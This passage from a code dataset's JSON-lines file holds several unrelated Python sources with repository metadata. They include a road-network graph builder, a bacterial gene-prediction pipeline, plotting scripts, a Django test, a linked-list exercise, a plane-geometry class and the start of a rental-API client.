for every red node u,\n # for every red node v:\n # remove all red nodes other than u and v\n # find shortest blue path between u and v\n # add red edge between u and v\n all_red_nodes = list(graph_settlement_view.nodes())\n\n import time\n start = time.time()\n print(f\"Start: {start}\")\n\n red_node_degrees = dict()\n red_nodes_with_edges = list()\n for red_node in all_red_nodes:\n red_node_degrees[red_node] = graph_segment_four_neighbor_combined_nodes.degree(red_node)\n if red_node_degrees[red_node]:\n red_nodes_with_edges.append(red_node)\n\n # for u, v in combinations(all_red_nodes, 2):\n for i, u in enumerate(red_nodes_with_edges):\n for j, v in enumerate(red_nodes_with_edges[i + 1:]):\n print(f\"\\r{i}x{j} / {len(red_nodes_with_edges)}\", end=\"\")\n graph_segment_view_other_nodes_removed = graph_segment_four_neighbor_combined_nodes.copy()\n for red_node in red_nodes_with_edges:\n if red_node not in [u, v]:\n graph_segment_view_other_nodes_removed.remove_node(red_node)\n if nx.has_path(graph_segment_view_other_nodes_removed, u, v):\n path = nx.shortest_path(graph_segment_view_other_nodes_removed, u, v)\n graph_settlement_view.add_edge(u, v, blue_nodes=path)\n print(f\"\\tDuration: {time.time() - start}\", end=\"\")\n\n nx.write_gpickle(graph_settlement_view, f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n 
self.graph_settlement_view = graph_settlement_view\n\n # finally, we can combine the parts into a single settlement view.\n def construct_settlement_view_from_parts(self):\n print(\"Building settlement view from parts...\")\n graph_settlement_view = nx.Graph()\n\n # first we'll read all the cities -- our RED nodes, and store them as nodes into the settlement_view\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n for index, city in settlement_df.iterrows():\n graph_settlement_view.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n name=city['city'],\n population=city['population']\n )\n print(f\"Read {graph_settlement_view.number_of_nodes()} red nodes.\")\n\n # now let's read the parts\n parts = [\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_0.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_1.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_2.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_3.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_4.gpickle\")\n ]\n\n for part in parts:\n for u, v, a in part.edges(data=True):\n # print(u, v, a)\n # import sys; sys.exit();\n graph_settlement_view.add_edge(u, v, blue_nodes=a['blue_nodes'])\n print(f\"{graph_settlement_view.number_of_nodes()} nodes and \"\n f\"{graph_settlement_view.number_of_edges()} edges.\")\n\n nx.write_gpickle(graph_settlement_view, f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n self.graph_settlement_view = graph_settlement_view\n\n def construct_tile_view(self):\n print(\"Building tile view...\")\n graph_segment_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n graph_tile_view = nx.Graph()\n\n min_lat = 400\n max_lat = -400\n min_lng = 400\n max_lng = -400\n with open(f\"{self.DATA_DIR}/cal.cnode.csv\") as f:\n for row in csv.reader(f):\n lat = float(row[2])\n lng = float(row[1])\n min_lat = min(lat, min_lat)\n max_lat = max(lat, max_lat)\n min_lng = min(lng, min_lng)\n max_lng = max(lng, max_lng)\n print(f\"min_lat: {min_lat} \\tmax_lat: {max_lat} \\tmin_lng: {min_lng} \\tmax_lng: {max_lng} \\t\")\n\n delta = 0.01\n\n # just some small utility functions\n def get_tile_id(_lat, _lng):\n return (\n math.floor((_lat - min_lat) / delta),\n math.floor((_lng - min_lng) / delta)\n )\n\n max_tile_i, max_tile_j = get_tile_id(max_lat, max_lng)\n for i in range(max_tile_i + 1):\n for j in range(max_tile_j + 1):\n sw_loc = GeoLocation.from_degrees(min_lat + i * delta, min_lng + j * delta)\n ne_loc = GeoLocation.from_degrees(min_lat + (i + 1) * delta, min_lng + (j + 1) * delta)\n center_loc = GeoLocation.from_degrees(min_lat + i * delta/2, min_lng + j * delta/2)\n graph_tile_view.add_node(\n (i, j), sw_loc=sw_loc, ne_loc=ne_loc, center_loc=center_loc, segment_nodes=set(), segment_edges=set()\n )\n\n # now we assign blue nodes to tiles they belong to\n blue_nodes = graph_segment_view.nodes(data=True)\n for node, attr in blue_nodes:\n location = attr['pos']\n tile_id = get_tile_id(location.deg_lat, location.deg_lon)\n graph_tile_view.nodes[tile_id]['segment_nodes'].append(node)\n\n # now we assign blue edges to tiles\n # we should ideally take all the tiles along the line joining u to v, then add a segment edge to all those\n # tiles. 
But no big deal\n for u, v in graph_segment_view.edges():\n location = blue_nodes[u]['pos']\n tile1 = get_tile_id(location.deg_lat, location.deg_lon)\n\n location = blue_nodes[v]['pos']\n tile2 = get_tile_id(location.deg_lat, location.deg_lon)\n\n graph_tile_view.nodes[tile1]['segment_edges'].append((u, v))\n\n if tile1 != tile2:\n graph_tile_view.nodes[tile2]['segment_edges'].append((u, v))\n\n # we need to delete those tiles that don't contain any roads at all. Would greatly speed up computation\n\n node_indices = []\n segment_lengths = []\n for node, attr in graph_tile_view.nodes(data=True):\n node_indices.append(node)\n segment_lengths.append(len(attr['segment_nodes']))\n for node, length in zip(node_indices, segment_lengths):\n if length == 0:\n graph_tile_view.remove_node(node)\n\n nx.write_gpickle(graph_tile_view, f\"{self.DATA_DIR}/graph_tile_view.gpickle\")\n self.graph_tile_view = graph_tile_view\n print(f\"Done! Created {graph_tile_view.number_of_nodes()} tiles.\")\n\n # if a blue node is gone, then the corresponding red edge must disappear\n def get_recalculated_settlement_view_from_segment_view(self, new_segment_view, city_damaged):\n new_settlement_view = self.graph_settlement_view.copy()\n\n city_damaged_map = {node : city_damaged[i] for i, node in enumerate(self.graph_settlement_view.nodes())}\n removed_edges = set()\n\n for red_edge_u, red_edge_v, attr in self.graph_settlement_view.edges(data=True):\n blue_u = attr['blue_nodes'][1]\n blue_v = attr['blue_nodes'][-2]\n if len(attr['blue_nodes']) == 2:\n if city_damaged_map[red_edge_u] or city_damaged_map[red_edge_v]:\n # direct city-city link. If one of the cities is damaged, then that link is broken\n removed_edges.add((red_edge_u, red_edge_v))\n continue\n if not (blue_u in new_segment_view and blue_v in new_segment_view):\n removed_edges.add((red_edge_u, red_edge_v))\n continue\n try:\n if nx.shortest_path_length(new_segment_view, blue_u, blue_v) > self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)]:\n removed_edges.add((red_edge_u, red_edge_v))\n except NetworkXNoPath:\n removed_edges.add((red_edge_u, red_edge_v))\n new_settlement_view.remove_edges_from(removed_edges)\n return new_settlement_view\n\n # This function takes a given set of tiles (damaged) and deletes the corresponding edges from the segmentView.\n # Useful for applying damages.\n def get_recalculated_segment_view(self, damaged_road_tiles):\n removed_blue_nodes = set()\n for tile in damaged_road_tiles:\n removed_blue_nodes = removed_blue_nodes.union(self.graph_tile_view.nodes[tile]['segment_nodes'])\n new_segment_view = self.graph_segment_view.copy()\n\n new_segment_view.remove_nodes_from(removed_blue_nodes)\n return new_segment_view\n\n\nif __name__ == '__main__':\n RoadNetwork(recreate_files=False)\n","sub_path":"webapp/poseidon/infrastructure/road_network_revised.py","file_name":"road_network_revised.py","file_ext":"py","file_size_in_byte":25349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"354827715","text":"#!/usr/bin/env python3\n\n\nimport sys\nimport os \nimport subprocess\nimport argparse\n\ndef genemark(i):\n\t\n\tif os.path.exists(\"./gms2results\") != True:\n\t\tsubprocess.call([\"mkdir\", \"gms2results\"])\n\tif os.path.exists(\"./gms2results/gfffiles\") != True:\n\t\tsubprocess.call([\"mkdir\",\"gms2results/gfffiles\"])\n\tif os.path.exists(\"./gms2results/nucleotidefasta\") != True:\n\t\tsubprocess.call([\"mkdir\",\"gms2results/nucleotidefasta\"])\n\tif 
os.path.exists(\"./gms2results/proteinfasta\") != True:\n\t\tsubprocess.call([\"mkdir\",\"gms2results/proteinfasta\"])\n\t\n\tgff = os.path.join(\"gms2results/gfffiles\",\"{}.gff\".format(i.split(\".\")[0]))\n\tnucleotides = os.path.join(\"gms2results/nucleotidefasta\",\"{}.fna\".format(i.split(\".\")[0]))\n\tproteins = os.path.join(\"gms2results/proteinfasta\",\"{}.faa\".format(i.split(\".\")[0]))\n\tdir = i\n\tsubprocess.call([\"./gms2_linux_64/gms2.pl\", \"--seq\", dir, \"--genome-type\", \"bacteria\", \"--output\",gff,\"--format\",\"gff\",\"--fnn\",nucleotides,\"--faa\",proteins])\n\t\ndef prodigal(i):\n\tif os.path.exists(\"./prodigalresults\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults\"])\n\tif os.path.exists(\"./prodigalresults/nucleotide\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults/nucleotide\"])\n\tif os.path.exists(\"./prodigalresults/protein\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults/protein\"])\n\tif os.path.exists(\"./prodigalresults/gff\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults/gff\"])\n\t\t\n\tprotein = os.path.join(\"prodigalresults/protein\",\"{}.faa\".format(i.split(\".\")[0]))\n\tnucleotide = os.path.join(\"prodigalresults/nucleotide\",\"{}.fna\".format(i.split(\".\")[0]))\n\tgff = os.path.join(\"prodigalresults/gff\",\"{}.gff\".format(i.split(\".\")[0]))\n\tdir = i\n\tsubprocess.call([\"./Prodigal/prodigal\",\"-i\",dir,\"-a\",protein,\"-d\",nucleotide,\"-o\",gff,\"-f\",\"gff\"])\n\ndef bedtools_func(i, home):\n\tif os.path.exists(\"./prodigal-genemark\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark'])\n\tif os.path.exists(\"./prodigal-genemark/gfffiles\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/gfffiles'])\n\tif os.path.exists(\"./prodigal-genemark/gfffilesunion\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/gfffilesunion'])\n\tif os.path.exists(\"./prodigal-genemark/nucleotides\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/nucleotides'])\n\tif os.path.exists(\"./prodigal-genemark/aminoacids\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/aminoacids'])\n\n\tprodigal_gff = os.path.join('prodigalresults','gff','{}.gff'.format(i.split(\".\")[0]))\n\t#gets gff files from prodigal\n\tgenemark_gff = os.path.join('gms2results','gfffiles','{}.gff'.format(i.split(\".\")[0]))\n\t#gets gff files from genemark\n\tintersect1 = os.path.join('prodigal-genemark/gfffiles','{}intersect1.gff'.format(i.split(\".\")[0]))\n\n\tintersect2 = os.path.join('prodigal-genemark/gfffiles','{}intersect2.gff'.format(i.split(\".\")[0]))\n\t#gets intersect from genemark and prodigal\n\tcommon = os.path.join('prodigal-genemark/gfffiles','{}common.gff'.format(i.split(\".\")[0]))\n\n\t#gets common from genemark and prodigal\n\tunion = os.path.join('prodigal-genemark/gfffilesunion','{}union.gff'.format(i.split(\".\")[0]))\n\t#gets union\n\tbedtools_intersect1 = ['bedtools2/bin/bedtools intersect -f 1.0 -r -wa -v -a {} -b {} > {}'.format(prodigal_gff,genemark_gff,intersect1)]\n\n\tbedtools_intersect2 = ['bedtools2/bin/bedtools intersect -f 1.0 -r -wa -v -b {} -a {} > {}'.format(prodigal_gff,genemark_gff,intersect2)]\n\t#command for intersect\n\tbedtools_common = ['bedtools2/bin/bedtools intersect -f 1.0 -r -a {} -b {} > {}'.format(prodigal_gff,genemark_gff,common)]\n\t#command for common\n\n\tsubprocess.call(bedtools_intersect1,shell=True)\n\tsubprocess.call(bedtools_intersect2,shell=True)\n\tsubprocess.call(bedtools_common,shell=True)\n\n\tcat = ['cat {} {} {}> 
{}'.format(intersect1,intersect2,common,union)]\n\t#concatenates to get union\n\tsubprocess.call(cat,shell=True)\n\tdir = i\n\tcreatefastaindex = ['samtools-1.9/bin/samtools','faidx',dir]\n\t#creates fasta index\n\tdnatoaapy = os.path.join(home,\"nucltoprotein.py\")\n\tsubprocess.call(createfastaindex)\n\tnucleotides = os.path.join(home,\"prodigal-genemark/nucleotides\",\"{}.fna\".format(i.split(\".\")[0]))\n\tfastasequences = ['bedtools2/bin/bedtools','getfasta','-fo',nucleotides,'-fi',dir,'-bed',union]\n\tamino = os.path.join(home,\"prodigal-genemark/aminoacids\",\"{}.faa\".format(i.split(\".\")[0]))\n\tsubprocess.call(fastasequences)\n\t\t\n\t#subprocess.call(['python3',dnatoaapy,nucleotides,amino])\n\tsubprocess.call(['rm','-f','{}.fai'.format(dir)])\n\ndef barrnap(i):\n\tif os.path.exists(\"./barrnap_results\") != True:\n\t\tsubprocess.call(['mkdir','barrnap_results'])\n\tif os.path.exists(\"./barrnap_results/gfffiles\") != True:\n\t\tsubprocess.call(['mkdir','barrnap_results/gfffiles'])\n\tif os.path.exists(\"./barrnap_results/nucleotides\") != True:\n\t\tsubprocess.call(['mkdir','barrnap_results/nucleotides'])\n\n\n\tgff = os.path.join(\"barrnap_results/gfffiles\",\"barnap_{}.gff\".format(i.split(\".\")[0]))\n\tnucleotides = os.path.join(\"barrnap_results/nucleotides\",\"barrnap_{}.fna\".format(i.split(\".\")[0]))\n\tdir = i\n\tsubprocess.call(['barrnap/bin/barrnap --outseq {} < {} > {}'.format(nucleotides,dir,gff)],shell=True)\n\ndef aragorn(i):\n\tif os.path.exists(\"./aragorn_results\") != True:\n\t\tsubprocess.call(['mkdir','aragorn_results'])\n\tif os.path.exists(\"./aragorn_results/gfffiles\") != True:\n\t\tsubprocess.call(['mkdir','aragorn_results/gfffiles'])\n\tif os.path.exists(\"./aragorn_results/nucleotides\") != True:\n\t\tsubprocess.call(['mkdir','aragorn_results/nucleotides'])\n\n\tgff = os.path.join(\"aragorn_results/gfffiles\",\"aragorn_{}.gff\".format(i.split(\".\")[0]))\n\tnucleotides = os.path.join(\"aragorn_results/nucleotides\",\"aragorn_{}.fna\".format(i.split(\".\")[0]))\n\ttRNAtxt = os.path.join(\"aragorn_results\",\"{}.txt\".format(i.split(\".\")[0]))\n\tdir = i\n\n\tsubprocess.call([\"aragorn1.2.38/aragorn\",\"-t\",\"-m\",\"-gc1\",\"-w\",dir,\"-fo\",\"-o\",nucleotides])\n\tsubprocess.call([\"aragorn1.2.38/aragorn\",\"-t\",\"-m\",\"-gc1\",\"-w\",dir,\"-o\",tRNAtxt])\n\tsubprocess.call([\"/usr/bin/perl\",\"cnv_aragorn2gff.pl\",\"-i\",dir,\"-o\",gff, \"-gff-ver=2\"])\n\ndef join(a,b):\n\tsubprocess.call(['mkdir','arabarr'])\n\n\tfor i,j in zip(sorted(os.listdir(a)),sorted(os.listdir(b))):\n\t\tsubprocess.call('cat aragorn_results/nucleotides/{} barrnap_results/nucleotides/{} > arabarr/arabarr_{}.fna'.format(i,j,i.split(\"_\")[1]),shell=True)\n\t\ndef main():\n\t# Initialize argument parser for script flags\n\tparser = argparse.ArgumentParser(description='Predict genes from assembled prokaryotic genomes.')\n\t# Sets arguments, requirements to run script, and type of argument input\n\t# help='sets description to be used by default ./script.py -h'\n\tparser.add_argument('-f', help='File for assembled genome input.', required=True, type=str)\n\tparser.add_argument('-p', help='Run Prodigal for ab-initio protein coding gene predictor.', required=False, action='store_true')\n\tparser.add_argument('-g', help='Run GeneMarkS-2 for ab-initio protein coding gene predictor.', required=False, action='store_true')\n\tparser.add_argument('-nc', help='Runs Aragorn and Barrnap for non-coding RNA prediction.', required=False, 
action='store_true')\n\tparser.add_argument('-ncs', help='Runs Aragorn and Barrnap independently.', required=False, action='store_true')\n\t\n\targs = parser.parse_args()\n\t# Error handling for file input path\n\t\t\n\t# Variable for current working directory\n\thome = os.getcwd()\n\t# Options to run either prodigal or genemark\n\tif args.p:\n\t\tprodigal(args.f)\n\tif args.g:\n\t\tgenemark(args.f)\n\t# Runs bedtools if both genemark and prodigal are selected\n\tif (args.p and args.g):\n\t\tbedtools_func(args.f, home)\n\t# Default mode to run both prodigal and genemark with bedtools_func\n\tif not args.p:\n\t\tif not args.g:\n\t\t\tprodigal(args.f)\n\t\t\tgenemark(args.f)\n\t\t\tbedtools_func(args.f, home)\n\t\n\t# Runs aragorn and barrnap if selected\n\tif args.nc:\n\t\taragorn(args.f)\n\t\tbarrnap(args.f)\n\t\tjoin('aragorn_results/nucleotides','barrnap_results/nucleotides')\n\tif args.ncs:\n\t\taragorn(args.f)\n\t\tbarrnap(args.f)\n\t\nif __name__ == '__main__':\n\tmain()","sub_path":"scripts/gene_prediction.py","file_name":"gene_prediction.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"168423994","text":"import os\nimport cv2\nimport numpy as np\nimport torch.utils.data as data\nimport random\n\n\nclass ImageDataset(data.Dataset):\n \"\"\"\n Args:\n dataset_dir: directory of dataset\n transform: dataset transform\n \"\"\"\n\n def __init__(self, dataset_dir, sorted=False, transform=None):\n # 随机取1000张图片\n self.image_info = []\n self.transform = transform\n images = next(os.walk(dataset_dir))[2]\n if sorted:\n images.sort()\n for img in images:\n if img.endswith('.png') or img.endswith('.jpg') or img.endswith('.jpeg'):\n self.image_info.append(os.path.join(dataset_dir, img))\n\n def __len__(self):\n return len(self.image_info)\n\n def __getitem__(self, index):\n image = cv2.imread(self.image_info[index])\n # 将BGR转化为RGB通道顺序\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n if self.transform:\n image = self.transform(image)\n return image\n","sub_path":"coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"353112386","text":"# Import python modules\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\n\ncurr_path = os.getcwd()\nos.chdir('../../../')\nsys.path.append(os.getcwd())\nos.chdir(curr_path)\n\nfrom static_classes.astro_helpers import AstroHelpers\n\n\n\n#%%\n'''\nMethod to plot the co-added spectra.\n'''\ndef plot_coadded_spectra(self,which,ax,xL=False):\n max_ = np.nanmax([np.nanmax(AstroHelpers.get_coadded_spectra(self,'2deg')),np.nanmax(AstroHelpers.get_coadded_spectra(self,'2deg_NN')),\n np.nanmax(AstroHelpers.get_coadded_spectra(self,'NM')),np.nanmax(AstroHelpers.get_coadded_spectra(self,'NM_NN')),\n np.nanmax(AstroHelpers.get_coadded_spectra(self,30))])\n min_ = 0\n \n prof = AstroHelpers.get_coadded_spectra(self,which) \n \n if which == 30:\n bins = AstroHelpers.get_bin_edges(header=self.header,ppv=self.ppv*self.binaryMask)\n \n else:\n bins = AstroHelpers.get_bin_edges(header=self.header,ppv=self.ppv)\n \n #plot profile as a function of bins\n plt.plot(bins,prof)\n \n #Set x and y lims\n plt.ylim(min_,max_)\n plt.xlim(self.header['VMIN'],self.header['VMAX'])\n \n #Set tick and label paramaters\n plt.tick_params(axis='y', which='both',labelleft='off',labelright='on')\n \n #Set axis labels and title \n ax.set_ylabel('$K/dv$', 
fontsize=self.fontsize)\n ax.yaxis.set_label_position(\"right\")\n \n if xL == True:\n plt.xlabel('V [km $s^{-1}$]', fontsize=self.fontsize)\n plt.xticks([-10,0,10],['-10','0','10'],fontsize=self.fontsize)\n else:\n plt.xticks([-10,0,10],['','',''])\n \n ax.tick_params(direction='in')\n \n \n #Set Fontsize of x ticks\n plt.yticks(fontsize=self.fontsize)","sub_path":"APJ_Paper/classes/plot/subclasses/simline_plot/class_methods/plot_coadded_spectra.py","file_name":"plot_coadded_spectra.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"461643216","text":"\nimport pandas\nimport matplotlib.pyplot as plt\nimport argparse\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser(description='Plot training history')\nparser.add_argument(\n 'input',\n type=Path,\n help='File from which to read the text')\nparser.add_argument(\n '--no_save',\n action='store_true',\n help='Save the figure to pdf file (same name) (default: %(default)s)')\n\nargs = parser.parse_args()\n\ndf = pandas.read_csv(args.input.open('r'))\ndf = df.set_index('epoch')\nfig = df.plot()\nplt.grid(b=True, which='both')\nif not args.no_save:\n saved_fig = args.input.with_suffix('.pdf')\n plt.savefig(saved_fig, format='pdf')\n print(\"Saved figure to: {}\".format(saved_fig))\nplt.show()\n","sub_path":"draw_history.py","file_name":"draw_history.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"133700103","text":"from django.test import TestCase\n\nfrom books.models import Books\nfrom books.serializers import BookSerializer\n\n\nclass BookSerializersTestCase(TestCase):\n def test_ok(self):\n book_1 = Books.objects.create(\n title='Test1 Titile1',\n author_name='Test1 author1',\n description='Test1 description1'\n )\n book_2 = Books.objects.create(\n title='Test2 Titile2',\n author_name='222aaaaaaaaaaaaaaaa',\n description='Test2 description2'\n )\n data = BookSerializer([book_1, book_2], many=True).data\n expected_data = [\n {\n 'id': book_1.id,\n 'title': 'Test1 Titile1',\n 'author_name': 'Test1 author1',\n 'description': 'Test1 description1'\n },\n {\n 'id': book_2.id,\n 'title': 'Test2 Titile2',\n 'author_name': '222aaaaaaaaaaaaaaaa',\n 'description': 'Test2 description2',\n }\n\n ]\n self.assertEqual(expected_data, data)\n print(expected_data)\n print(data)\n","sub_path":"tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"635917798","text":"#!/usr/bin/python\n\ndef main():\n data = open(\"users.dat\", \"r\")\n outfile = open(\"usersok.dat\", \"w\")\n\n for line in data:\n linep = line.rstrip(\"\\n\")\n linep = line.split(\"::\")\n if linep[1] == \"M\":\n gender = 11\n else:\n gender = 12\n uid = int(linep[0])\n age = int(linep[2])\n job = int(linep[3]) + 100\n\n out = \"%d %d\\n%d %d\\n%d %d\\n\" % (uid, gender, uid, age, uid, job)\n outfile.write(out)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"users2mymedialite.py","file_name":"users2mymedialite.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"491234675","text":"# coding=utf-8\n\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n def reverseKGroup(self, 
head, k):\n dummy = ListNode(0)\n dummy.next = head\n\n pre = dummy\n end = dummy\n\n while end:\n for i in range(k):\n if not end:\n break\n end = end.next\n if not end:\n break\n start = pre.next\n after = end.next\n end.next = None\n pre.next = self.reverse(start)\n start.next = after\n\n pre = end = start\n return dummy.next\n\n def reverse(self, head):\n pre = None\n curr = head\n while curr:\n curr.next, pre, curr = pre, curr, curr.next\n return pre\n\n","sub_path":"1-50/025ReverseKGroupHard.py","file_name":"025ReverseKGroupHard.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"77676242","text":"# -*- coding: utf-8 -*-\n\nfrom decimal import Decimal, getcontext\n\nfrom vector import Vector\n\ngetcontext().prec = 30\n\n\nclass Plane(object):\n\n NO_NONZERO_ELTS_FOUND_MSG = 'No nonezero elements found'\n\n def __init__(self, normal_vector=None, constant_term=None):\n self.dimension = 3\n\n if not normal_vector:\n all_zeros = ['0']*self.dimension\n normal_vector = Vector(all_zeros)\n self.normal_vector = normal_vector\n\n if not constant_term:\n constant_term = Decimal('0')\n self.constant_term = Decimal(constant_term)\n\n self.set_basepoint()\n\n\n def set_basepoint(self):\n try:\n n = self.normal_vector.coordinates\n c = self.constant_term\n basepoint_coords = ['0']*self.dimension\n\n initial_index = Plane.first_nonzero_index(n)\n initial_coefficient = n[initial_index]\n\n basepoint_coords[initial_index] = c/initial_coefficient\n self.basepoint = Vector(basepoint_coords)\n\n except Exception as e:\n if str(e) == Plane.NO_NONZERO_ELTS_FOUND_MSG:\n self.basepoint = None\n else:\n raise e\n\n\n def __str__(self):\n\n num_decimal_places = 3\n\n def write_coefficient(coefficient, is_initial_term=False):\n coefficient = round(coefficient, num_decimal_places)\n if coefficient % 1 == 0:\n coefficient = int(coefficient)\n\n output = ''\n\n if coefficient < 0:\n output += '-'\n if coefficient > 0 and not is_initial_term:\n output += '+'\n\n if not is_initial_term:\n output += ' '\n\n if abs(coefficient) != 1:\n output += '{}'.format(abs(coefficient))\n\n return output\n\n n = self.normal_vector.coordinates\n\n try:\n initial_index = Plane.first_nonzero_index(n)\n terms = [write_coefficient(n[i], is_initial_term=(i==initial_index)) + 'x_{}'.format(i+1)\n for i in range(self.dimension) if round(n[i], num_decimal_places) != 0]\n output = ' '.join(terms)\n\n except Exception as e:\n if str(e) == self.NO_NONZERO_ELTS_FOUND_MSG:\n output = '0'\n else:\n raise e\n\n constant = round(self.constant_term, num_decimal_places)\n if constant % 1 == 0:\n constant = int(constant)\n output += ' = {}'.format(constant)\n\n return output\n\n\n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Plane.NO_NONZERO_ELTS_FOUND_MSG)\n\n def is_parallel_to(self, p):\n return self.normal_vector.is_parallel_to(p.normal_vector)\n \n def __eq__(self, p):\n if self.normal_vector.iszero():\n if not p.normal_vector.iszero():\n return False\n else:\n diff = self.constant_term - p.constant_term\n return MyDecimal(diff).is_near_zero()\n elif p.normal_vector.iszero():\n return False\n \n return (self.is_parallel_to(p) and \n self.basepoint.minus(p.basepoint).is_orthogonal_to(self.normal_vector))\n \n def gaussian(self, p1, p2):\n n = [self.normal_vector, p1.normal_vector, p2.normal_vector]\n t = [self.constant_term, 
p1.constant_term, p2.constant_term]\n z = sorted([[first_nonzero_index(x[0])+list(x)] for x in zip(n,t)])\n for x in xrange(len(z)-1):\n if z[x][0] bool:\n return urlparse(url).scheme.lower() == 'https'\n\n\nclass VacasaConnect:\n \"\"\"This class serves as a wrapper for the Vacasa Connect API.\"\"\"\n\n _access_token = None\n _refresh_token = None\n\n def __init__(self,\n api_key: str,\n api_secret: str,\n endpoint: str = 'https://connect.vacasa.com',\n timezone: str = 'UTC',\n language: str = 'en-US',\n currency: str = 'USD'\n ):\n \"\"\"Initialize an instance of the VacasaConnect class.\n\n Args:\n api_key: Your Vacasa Connect API key.\n api_secret: Your Vacasa Connect API secret.\n endpoint: The URL of the Vacasa Connect API.\n timezone: UTC or a long-form version of a timezone from the tz\n database. Example: 'America/New_York'. See\n https://en.wikipedia.org/wiki/List_of_tz_database_time_zones\n for more info.\n language: The language you will accept. If no localized content\n can be found, an error response is returned. Allowed format is\n {{ISO-639-1 Code}}-{{ISO 3166-1 Alpha-2 Code}}.\n currency: An ISO-4217 currency code. Send to request monetary\n values in this currency.\n \"\"\"\n if not is_https_url(endpoint):\n raise ValueError(f\"`endpoint` scheme should be https\")\n self.api_key = api_key\n self.api_secret = api_secret\n self.endpoint = endpoint.rstrip('/')\n self.timezone = timezone\n self.language = language\n self.currency = currency\n self._populate_tokens()\n\n def _populate_tokens(self):\n \"\"\"Decide if current tokens need refreshed and populate them.\"\"\"\n # generate a token if we don't have one yet\n if self._access_token is None:\n tokens = self._get_new_tokens()\n self._access_token = tokens.get('access_token')\n self._refresh_token = tokens.get('refresh_token')\n else:\n now = pendulum.now()\n expiration = pendulum.parse(self._refresh_token['expires_at'])\n\n # refresh the token if it has expired\n if now > expiration:\n tokens = self._refresh_tokens()\n self._access_token = tokens.get('access_token')\n self._refresh_token = tokens.get('refresh_token')\n\n def _get_new_tokens(self) -> dict:\n \"\"\"Generate new access and refresh tokens.\"\"\"\n timestamp = int(pendulum.now().timestamp())\n payload = {\n 'data': {\n 'api_key': self.api_key,\n 'timestamp': timestamp,\n 'signature': self._generate_signature(timestamp)\n }\n }\n headers = {'content-type': 'application/json'}\n\n r = self._post(f\"{self.endpoint}/auth\", json=payload, headers=headers)\n tokens = r.json().get('data', {}).get('attributes', {})\n self._validate_tokens(tokens)\n\n return tokens\n\n def _refresh_tokens(self) -> dict:\n \"\"\"Refresh existing tokens. 
Necessary when they expire.\"\"\"\n url = f\"{self.endpoint}/auth/refresh\"\n payload = {\n 'data': {\n 'refresh_token': self._refresh_token['token']\n }\n }\n r = self._post(url, json=payload)\n tokens = r.json().get('data', {}).get('attributes', {})\n self._validate_tokens(tokens)\n\n return tokens\n\n @staticmethod\n def _validate_tokens(tokens):\n \"\"\"Raise errors for incomplete tokens.\"\"\"\n if 'access_token' not in tokens:\n raise LookupError(\"access_token not found\")\n\n if 'refresh_token' not in tokens:\n raise LookupError(\"refresh_token not found\")\n\n def _headers(self, language=None, currency=None) -> dict:\n \"\"\"Build common headers.\"\"\"\n self._populate_tokens()\n\n return {\n 'Authorization': f\"Bearer {self._access_token['token']}\",\n 'Accept-Language': self.language if language is None else language,\n 'X-Accept-Currency': self.currency if currency is None else currency,\n 'X-Accept-Timezone': self.timezone\n }\n\n def _generate_signature(self, timestamp: int) -> str:\n \"\"\"Create a hash signature used for generating new tokens.\"\"\"\n secret = bytes(self.api_secret, 'utf-8')\n message = f\"{self.api_key}{timestamp}{self.api_secret}\".encode('utf-8')\n\n return hmac.new(secret, message, hashlib.sha256).hexdigest()\n\n @staticmethod\n def __get(url, headers: dict = None, params: dict = None):\n \"\"\"HTTP GET request helper.\"\"\"\n if headers is None:\n headers = {}\n\n r = requests.get(url, headers=headers, params=params)\n 